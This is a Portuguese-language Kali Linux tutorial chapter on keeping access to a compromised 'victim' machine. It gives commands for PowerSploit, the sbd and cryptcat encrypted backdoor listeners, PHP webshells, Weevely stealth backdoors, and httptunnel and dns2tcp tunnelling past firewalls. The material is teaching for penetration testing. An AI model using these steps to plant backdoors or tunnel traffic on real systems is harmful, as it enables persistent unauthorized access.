Kali Linux - Mantendo Acesso

Neste capítulo, veremos as ferramentas que Kali usa para manter a conexão e para acessar uma máquina hackeada, mesmo quando ela se conecta e desconecta novamente.

Powersploit

Esta é uma ferramenta para máquinas Windows. Ele tem PowerShell instalado na máquina das vítimas. Essa ferramenta ajuda o hacker a se conectar com a máquina da vítima via PowerShell.

Para abri-lo, abra o terminal à esquerda e digite o seguinte comando para entrar na pasta powersploit -

cd /usr/share/powersploit/

Se você digitar “ls”ele listará todas as ferramentas powersploit que você pode baixar e instalar na máquina da vítima depois de obter acesso. A maioria deles tem nomes autoexplicados de acordo com seus nomes.

Uma maneira fácil de baixar essa ferramenta na máquina da vítima é criar um servidor web, que as ferramentas do Powersploit permitem criar facilmente usando o seguinte comando -

python -m SimpleHTTPServer

Depois disso, se você digitar: http: // <Kali machine ip_address>: 8000 / o resultado é o seguinte.

Sbd

sbd é uma ferramenta semelhante ao Netcat. É portátil e pode ser usado em máquinas Linux e Microsoft. sbd apresenta criptografia AES-CBC-128 + HMAC-SHA1> Basicamente, ajuda a conectar-se à máquina da vítima a qualquer momento em uma porta específica e enviar comandos remotamente.

Para abri-lo, vá até o terminal e digite “sbd -l -p port” para o servidor aceitar conexões.

Neste caso, vamos colocar a porta 44 onde o servidor irá escutar.

No site da vítima, digite “sbd IPofserver port”. Uma conexão será estabelecida onde podemos enviar os comandos remotos.

Nesse caso, é “localhost”, pois realizamos o teste na mesma máquina.

Finalmente, no servidor, você verá que ocorreu uma conexão, conforme mostrado na imagem a seguir.

Webshells

Webshells podem ser usados ​​para manter o acesso ou hackear um site. Mas a maioria deles é detectada por antivírus. O shell C99 php é muito conhecido entre os antivírus. Qualquer antivírus comum o detectará facilmente como um malware.

Geralmente, sua função principal é enviar comandos do sistema por meio de interfaces da web.

Para abri-lo, digite “cd /usr/share/webshells/” no terminal.

Como você pode ver, eles são divididos em classes de acordo com a linguagem de programação: asp, aspx, cfm, jsp, perl, php

Se você entrar na pasta PHP, poderá ver todos os webshells para páginas php.

Para enviar o shell para um servidor web, por exemplo “simple-backdoor.php” abra a página da web e o URL do shell da web.

No final, escreva o comando cmd. Você terá todas as informações mostradas na imagem a seguir.

Weevely

Weevely é um shell da web PHP que simula uma conexão do tipo telnet. É uma ferramenta para pós-exploração de aplicativos da web e pode ser usado como backdoor furtivo ou shell da web para gerenciar contas legítimas da web, mesmo as hospedadas gratuitamente.

Para abri-lo, vá até o terminal e digite “weevely” onde você pode ver seu uso.

Para gerar o shell, digite “weevely generate password pathoffile”. Como pode ser visto na imagem a seguir, ele é gerado na pasta “Desktop” e o arquivo deve ser carregado em um servidor web para obter acesso.

Depois de fazer o upload do shell da web, conforme mostrado na imagem a seguir, podemos conectar com cmd ao servidor usando o comando “weevely URL password” onde você pode ver que uma sessão foi iniciada.

túnel http

http-tunnel cria um fluxo de dados virtual bidirecional encapsulado em solicitações HTTP. As solicitações podem ser enviadas por meio de um proxy HTTP, se desejado. Isso pode ser útil para usuários atrás de firewalls restritivos. Se o acesso WWW for permitido através de um proxy HTTP, é possível usar http-tunnel e telnet ou PPP para se conectar a um computador fora do firewall.

Primeiro, devemos criar um servidor de túnel com o seguinte comando -

httptunnel_server –h

Então, no tipo de site do cliente “httptunnel_client –h” e ambos começarão a aceitar conexões.

dns2tcp

Esta é novamente uma ferramenta de túnel que ajuda a passar o tráfego TCP pelo tráfego DNS, o que significa porta UDP 53.

Para começar, digite “dns2tcpd”. O uso é explicado quando você abre o script.

No site do servidor, digite este comando para configurar o arquivo.

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

No site do cliente, digite este comando.

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh [email protected] -p 7891 -D 7076

O tunelamento começará com este comando.

cryptcat

É outra ferramenta como o Netcat que permite fazer conexões TCP e UDP com a máquina da vítima de forma criptografada.

Para iniciar um servidor para escutar uma conexão, digite o seguinte comando -

cryptcat –l –p port –n

Onde,

  • -l significa ouvir uma conexão

  • -p significa o parâmetro do número da porta

  • -n significa não fazer a resolução de nome

No site do cliente, o comando de conexão é “cryptcat IPofServer PortofServer”